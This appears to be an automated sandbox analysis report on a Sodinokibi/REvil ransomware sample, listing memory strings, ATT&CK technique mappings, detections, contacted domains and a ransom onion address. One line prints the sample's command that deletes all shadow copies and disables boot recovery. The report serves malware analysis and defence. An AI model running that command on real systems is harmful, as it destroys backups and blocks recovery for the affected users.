              Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052670242.0000000002580000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmwp_31bf3856ad364e35_10.0.19041.1949_none_a9b86d6c1534dc66\E
              Source: RQzHm5vLxs.exe, 00000000.00000003.2083442379.00000000039F9000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2083589826.0000000003A4B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\wow64_microsoft-hyper-v-winsock-provider_31bf3856ad364e35_10.0.19041.1_none_97e0d8d7edeea164\
              Source: RQzHm5vLxs.exe, 00000000.00000003.2113280642.0000000003B6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vsmb_31bf3856ad364e35_10.0.19041.1741_none_a3a0448c191b2fda\f\
              Source: RQzHm5vLxs.exe, 00000000.00000003.2130830938.0000000003B13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-integration-rdv-core_31bf3856ad364e35_10.0.19041.964_none_3542494c595902f8\f\D
              Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-m..t-remotefilebrowser_31bf3856ad364e35_10.0.19041.746_none_6fbcad1699b89a67\
              Source: RQzHm5vLxs.exe, 00000000.00000003.2113280642.0000000003B6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmwp_31bf3856ad364e35_10.0.19041.1949_none_a9b86d6c1534dc66\f\
              Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-v..rvcluster.resources_31bf3856ad364e35_10.0.19041.1_en-gb_71570953289cd4d0\Z
              Source: RQzHm5vLxs.exe, 00000000.00000003.2113280642.0000000003B6D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2153961554.0000000003B73000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-pvhd-parser_31bf3856ad364e35_10.0.19041.1645_none_fe1307608fa06d8c\f\
              Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-m..t-clients.resources_31bf3856ad364e35_10.0.19041.1_en-us_a3e0d97c4c052586\:
              Source: RQzHm5vLxs.exe, 00000000.00000003.2216869042.0000000003B22000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2159477116.0000000003B13000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000002.2928139123.0000000003B2A000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2217250268.0000000003B22000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2130830938.0000000003B13000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2158900978.0000000003AFB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-synthfcvdev_31bf3856ad364e35_10.0.19041.1741_none_b365912b94b35a98\f\
              Source: RQzHm5vLxs.exe, 00000000.00000002.2927128604.000000000257D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-hypervcluster_31bf3
              Source: RQzHm5vLxs.exe, 00000000.00000003.2130830938.0000000003B13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vsmb.resources_31bf3856ad364e35_10.0.19041.423_en-us_f14a4bbefe65ac87\f\89K
              Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-d..s-vmswitch-netsetup_31bf3856ad364e35_10.0.19041.2006_none_f93d3f541072d580\
              Source: RQzHm5vLxs.exe, 00000000.00000003.2119219136.00000000024FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\System32\DriverStore\FileRepository\vmci.inf_amd64_68ed49469341f563\
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeCode function: 0_2_00D93B35 HeapCreate,GetProcessHeap,0_2_00D93B35
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeCode function: 0_2_00D949C2 rdtsc 0_2_00D949C2
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeCode function: 0_2_00D941FC mov eax, dword ptr fs:[00000030h]0_2_00D941FC
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeCode function: 0_2_00D94562 mov ecx, dword ptr fs:[00000030h]0_2_00D94562
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailuresJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeCode function: 0_2_00D93D05 cpuid 0_2_00D93D05
              Source: C:\Users\user\Desktop\RQzHm5vLxs.exeCode function: 0_2_00D942A2 GetUserNameW,0_2_00D942A2
              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
              1
              Replication Through Removable Media
              12
              Native API
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              OS Credential Dumping11
              Peripheral Device Discovery
              1
              Replication Through Removable Media
              1
              Archive Collected Data
              Exfiltration Over Other Network Medium1
              Data Obfuscation
              Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without Authorization2
              Data Encrypted for Impact
              Acquire InfrastructureGather Victim Identity Information
              Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
              Process Injection
              11
              File Deletion
              LSASS Memory1
              Account Discovery
              Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth2
              Ingress Tool Transfer
              SIM Card SwapObtain Device Cloud Backups1
              Inhibit System Recovery
              DomainsCredentials
              Domain AccountsAtLogon Script (Windows)Logon Script (Windows)3
              Masquerading
              Security Account Manager3
              File and Directory Discovery
              SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration21
              Encrypted Channel
              1
              Defacement
              DNS ServerEmail Addresses
              Local AccountsCronLogin HookLogin Hook1
              Virtualization/Sandbox Evasion
              NTDS24
              System Information Discovery
              Distributed Component Object ModelInput CaptureTraffic Duplication3
              Non-Application Layer Protocol
              Data DestructionVirtual Private ServerEmployee Names
              Cloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
              Process Injection
              LSA Secrets121
              Security Software Discovery
              SSHKeyloggingScheduled Transfer14
              Application Layer Protocol
              Data Encrypted for ImpactServerGather Victim Network Information
              Replication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureData Transfer Size Limits1
              Proxy
              Service StopBotnetDomain Properties
              External Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync2
              Process Discovery
              Windows Remote ManagementWeb Portal CaptureExfiltration Over C2 ChannelCommonly Used PortInhibit System RecoveryWeb ServicesDNS
              Drive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
              Application Window Discovery
              Cloud ServicesCredential API HookingExfiltration Over Alternative ProtocolApplication Layer ProtocolDefacementServerlessNetwork Trust Dependencies
              Exploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
              System Owner/User Discovery
              Direct Cloud VM ConnectionsData StagedExfiltration Over Symmetric Encrypted Non-C2 ProtocolWeb ProtocolsInternal DefacementMalvertisingNetwork Topology
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              RQzHm5vLxs.exe92%ReversingLabsWin32.Ransomware.Sodinokibi
              RQzHm5vLxs.exe100%AviraTR/Crypt.XPACK.Gen
              RQzHm5vLxs.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://p-ride.live:443/data/image/oe.gifv1.00%Avira URL Cloudsafe
              https://patriotcleaning.net:443/admin/graphic/ervzot.jpgs100%Avira URL Cloudmalware
              https://so-sage.fr/0%Avira URL Cloudsafe
              http://decryptor.top/45C1E9BA4D645606100%Avira URL Cloudmalware
              https://rarefoods.ro:443/admin/pics/wcyshd.pngebResources0%Avira URL Cloudsafe
              https://brownswoodblog.com:443/admin/pics/hdxsmg.gifData0%Avira URL Cloudsafe
              https://p-ride.live/data/image/oe.gif0%Avira URL Cloudsafe
              https://so-sage.fr/10%Avira URL Cloudsafe
              https://so-sage.fr/news/game/bvprbb.png0%Avira URL Cloudsafe
              https://brownswoodblog.com/admin/pics/hdxsmg.gifmsu0%Avira URL Cloudsafe
              https://rarefoods.ro/r0%Avira URL Cloudsafe
              http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606100%Avira URL Cloudmalware
              https://brownswoodblog.com/admin/pics/hdxsmg.gif0%Avira URL Cloudsafe
              https://rarefoods.ro/admin/pics/wcyshd.png0%Avira URL Cloudsafe
              https://patriotcleaning.net/admin/graphic/ervzot.jpg100%Avira URL Cloudmalware
              https://brownswoodblog.com/0%Avira URL Cloudsafe
              https://avtoboss163.ru:443/static/assets/hbhezx.pngources0%Avira URL Cloudsafe
              https://avtoboss163.ru/static/assets/hbhezx.png0%Avira URL Cloudsafe
              http://brownswoodblog.com/0%Avira URL Cloudsafe
              https://so-sage.fr/Y0%Avira URL Cloudsafe
              https://rarefoods.ro/admin/pics/wcyshd.png10%Avira URL Cloudsafe
              https://patriotcleaning.net/100%Avira URL Cloudmalware
              https://avtoboss163.ru/0%Avira URL Cloudsafe
              https://rarefoods.ro/0%Avira URL Cloudsafe
              https://patriotcleaning.net/W100%Avira URL Cloudmalware
              https://so-sage.fr:443/news/game/bvprbb.pngt0%Avira URL Cloudsafe
              http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/100%Avira URL Cloudmalware
              http://decryptor.top/100%Avira URL Cloudmalware
              NameIPActiveMaliciousAntivirus DetectionReputation
              avtoboss163.ru
              185.32.57.142
              truetrue
                unknown
                patriotcleaning.net
                138.197.111.104
                truetrue
                  unknown
                  so-sage.fr
                  137.74.231.3
                  truetrue
                    unknown
                    p-ride.live
                    172.67.132.175
                    truetrue
                      unknown
                      brownswoodblog.com
                      172.67.219.93
                      truetrue
                        unknown
                        rarefoods.ro
                        unknown
                        unknowntrue
                          unknown
                          NameMaliciousAntivirus DetectionReputation
                          https://so-sage.fr/news/game/bvprbb.pngfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://p-ride.live/data/image/oe.giffalse
                          • Avira URL Cloud: safe
                          unknown
                          https://patriotcleaning.net/admin/graphic/ervzot.jpgfalse
                          • Avira URL Cloud: malware
                          unknown
                          https://avtoboss163.ru/static/assets/hbhezx.pngfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://brownswoodblog.com/admin/pics/hdxsmg.giffalse
                          • Avira URL Cloud: safe
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          https://so-sage.fr/RQzHm5vLxs.exe, 00000000.00000002.2925814967.00000000007BE000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://rarefoods.ro:443/admin/pics/wcyshd.pngebResourcesRQzHm5vLxs.exe, 00000000.00000002.2925814967.0000000000782000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://p-ride.live:443/data/image/oe.gifv1.0RQzHm5vLxs.exe, 00000000.00000002.2925814967.0000000000782000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://so-sage.fr/1RQzHm5vLxs.exe, 00000000.00000002.2925814967.00000000007BE000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://decryptor.top/45C1E9BA4D645606RQzHm5vLxs.exe, 00000000.00000003.2146778356.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052588010.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2113111290.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1922030335.0000000002520000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1922100187.0000000002509000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1921990735.0000000002515000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2215006732.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2062978982.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000002.2926971200.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2146982196.0000000002509000.00000004.00000020.00020000.00000000.sdmp, 985drm9-readme.txt17.0.dr, 985drm9-readme.txt13.0.dr, 985drm9-readme.txt28.0.dr, 985drm9-readme.txt10.0.dr, 985drm9-readme.txt51.0.dr, 985drm9-readme.txt39.0.dr, 985drm9-readme.txt42.0.dr, 985drm9-readme.txt61.0.dr, 985drm9-readme.txt30.0.dr, 985drm9-readme.txt47.0.dr, 985drm9-readme.txt31.0.drfalse
                          • Avira URL Cloud: malware
                          unknown
                          https://brownswoodblog.com:443/admin/pics/hdxsmg.gifDataRQzHm5vLxs.exe, 00000000.00000002.2925814967.0000000000782000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://torproject.org/RQzHm5vLxs.exe, 00000000.00000003.2146778356.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1665541859.0000000002520000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052588010.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2113111290.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1922030335.0000000002520000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1922100187.0000000002509000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1921990735.0000000002515000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2215006732.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2062978982.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000002.2926971200.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2146982196.0000000002509000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1665524743.0000000002510000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1921931735.0000000002522000.00000004.00000020.00020000.00000000.sdmp, 985drm9-readme.txt17.0.dr, 985drm9-readme.txt13.0.dr, 985drm9-readme.txt28.0.dr, 985drm9-readme.txt10.0.dr, 985drm9-readme.txt51.0.dr, 985drm9-readme.txt39.0.dr, 985drm9-readme.txt42.0.dr, 985drm9-readme.txt61.0.drfalse
                            high
                            https://patriotcleaning.net:443/admin/graphic/ervzot.jpgsRQzHm5vLxs.exe, 00000000.00000002.2925814967.0000000000782000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            unknown
                            https://brownswoodblog.com/admin/pics/hdxsmg.gifmsuRQzHm5vLxs.exe, 00000000.00000002.2925814967.000000000075B000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://rarefoods.ro/rRQzHm5vLxs.exe, 00000000.00000002.2925814967.000000000075B000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606RQzHm5vLxs.exe, 00000000.00000003.2146778356.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052588010.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2113111290.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1922030335.0000000002520000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1922100187.0000000002509000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1921990735.0000000002515000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2215006732.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2062978982.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000002.2926971200.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2146982196.0000000002509000.00000004.00000020.00020000.00000000.sdmp, 985drm9-readme.txt17.0.dr, 985drm9-readme.txt13.0.dr, 985drm9-readme.txt28.0.dr, 985drm9-readme.txt10.0.dr, 985drm9-readme.txt51.0.dr, 985drm9-readme.txt39.0.dr, 985drm9-readme.txt42.0.dr, 985drm9-readme.txt61.0.dr, 985drm9-readme.txt30.0.dr, 985drm9-readme.txt47.0.dr, 985drm9-readme.txt31.0.drtrue
                            • Avira URL Cloud: malware
                            unknown
                            http://brownswoodblog.com/RQzHm5vLxs.exe, 00000000.00000002.2925814967.0000000000782000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000002.2925814967.00000000007C4000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://avtoboss163.ru:443/static/assets/hbhezx.pngourcesRQzHm5vLxs.exe, 00000000.00000002.2925814967.0000000000782000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://rarefoods.ro/admin/pics/wcyshd.pngRQzHm5vLxs.exe, 00000000.00000002.2925814967.000000000075B000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/RQzHm5vLxs.exe, 00000000.00000003.1665541859.0000000002520000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1665524743.0000000002510000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1921931735.0000000002522000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            https://brownswoodblog.com/RQzHm5vLxs.exe, 00000000.00000002.2925814967.00000000007C4000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://rarefoods.ro/admin/pics/wcyshd.png1RQzHm5vLxs.exe, 00000000.00000002.2925814967.000000000075B000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://so-sage.fr/YRQzHm5vLxs.exe, 00000000.00000002.2925814967.00000000007BE000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://avtoboss163.ru/RQzHm5vLxs.exe, 00000000.00000002.2925814967.00000000007A6000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://patriotcleaning.net/RQzHm5vLxs.exe, 00000000.00000002.2925814967.00000000007C4000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            unknown
                            https://rarefoods.ro/RQzHm5vLxs.exe, 00000000.00000002.2925814967.0000000000782000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://patriotcleaning.net/WRQzHm5vLxs.exe, 00000000.00000002.2925814967.00000000007C4000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            unknown
                            http://decryptor.top/RQzHm5vLxs.exe, 00000000.00000003.1665541859.0000000002520000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1665524743.0000000002510000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1921931735.0000000002522000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            https://so-sage.fr:443/news/game/bvprbb.pngtRQzHm5vLxs.exe, 00000000.00000002.2925814967.0000000000782000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            137.74.231.3
                            so-sage.frFrance
                            16276OVHFRtrue
                            172.67.219.93
                            brownswoodblog.comUnited States
                            13335CLOUDFLARENETUStrue
                            138.197.111.104
                            patriotcleaning.netUnited States
                            14061DIGITALOCEAN-ASNUStrue
                            185.32.57.142
                            avtoboss163.ruRussian Federation
                            60357MEGAGROUP-ASRUtrue
                            172.67.132.175
                            p-ride.liveUnited States
                            13335CLOUDFLARENETUStrue
                            Joe Sandbox Version:38.0.0 Ammolite
                            Analysis ID:1343919
                            Start date and time:2023-11-17 00:49:06 +01:00
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 5m 26s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:8
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample file name:RQzHm5vLxs.exe
                            renamed because original name is a hash value
                            Original Sample Name:17d153a225ea04a229862875795eeec0adb8c3e2769ba0e05073baaf86850467.exe
                            Detection:MAL
                            Classification:mal100.rans.troj.evad.winEXE@4/211@6/5
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 60
                            • Number of non-executed functions: 11
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                            • Report size getting too big, too many NtCreateFile calls found.
                            • Report size getting too big, too many NtOpenFile calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtSetInformationFile calls found.
                            • VT rate limit hit for: RQzHm5vLxs.exe
                            TimeTypeDescription
                            00:51:58API Interceptor3x Sleep call for process: RQzHm5vLxs.exe modified
                            No context
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            avtoboss163.ruStrong.exeGet hashmaliciousUnknownBrowse
                            • 37.140.192.212
                            so-sage.frscript.exe.7582a080.0x0000000002360000-0x0000000002401fff.exeGet hashmaliciousHTMLPhisher SodinokibiBrowse
                            • 217.182.126.186
                            patriotcleaning.netscript.exe.7582a080.0x0000000002360000-0x0000000002401fff.exeGet hashmaliciousHTMLPhisher SodinokibiBrowse
                            • 172.67.142.212
                            p-ride.livescript.exe.7582a080.0x0000000002360000-0x0000000002401fff.exeGet hashmaliciousHTMLPhisher SodinokibiBrowse
                            • 104.28.13.75
                            #Uc9c0#Ubd88#Uc744#Uc704#Ud55c #Uc1a1#Uc7a5.docx.exeGet hashmaliciousBrowse
                            • 104.28.13.75
                            #Uc0ac#Uac74#Uc5d0 #Uad00#Ud55c #Uc11c#Ub958 SBL4990193.doc.exeGet hashmaliciousBrowse
                            • 104.28.12.75
                            #Uc18c#Ud3ec #Uc120#Uc5b8.doc.exeGet hashmaliciousBrowse
                            • 104.28.12.75
                            #Uc0ac#Uac74#Uc5d0 #Uad00#Ud55c #Uc11c#Ub958.doc.exeGet hashmaliciousBrowse
                            • 104.28.12.75
                            #Ubc95#Uc6d0 #Uc11c#Ub958.doc.exeGet hashmaliciousBrowse
                            • 104.28.12.75
                            brownswoodblog.com28112019_2019-11-28_04-06.exeGet hashmaliciousSodinokibiBrowse
                            • 104.18.61.24
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            OVHFRywkyQKUlD3.exeGet hashmaliciousSodinokibiBrowse
                            • 91.121.55.191
                            jXz2ukrd2P.exeGet hashmaliciousSodinokibi, Chaos, Conti, Netwalker, Python Ransomware, Revil, TrojanRansomBrowse
                            • 145.239.37.162
                            a0QFYpDZZz.exeGet hashmaliciousSodinokibiBrowse
                            • 51.75.34.224
                            PGeBff2Pio.exeGet hashmaliciousSodinokibi, TrojanRansomBrowse
                            • 213.186.33.2
                            GoogleCrashHandler64.exeGet hashmaliciousNanominer, XmrigBrowse
                            • 149.56.14.135
                            GoogleCrashHandler64.exeGet hashmaliciousNanominer, XmrigBrowse
                            • 149.56.14.135
                            https://sender18.zohoinsights.com/ck1/2d6f.327230a/cf8e8100-6f25-11ee-bf15-525400d4bb1c/f560b8174e6aef5ec61aaea6055fec0786db99c7/2?e=BwZ7shaMYcEgQVNqqnLBVMSwuQWr5SU%2BDbOCYLSVGg8I%2Boc1UGTJ5hVGXtuX2BimpAZRRe9py3fpRywSthIGtW5mNdEZxNkpJh%2FcBXtOrU4%3DGet hashmaliciousHTMLPhisherBrowse
                            • 147.135.65.48
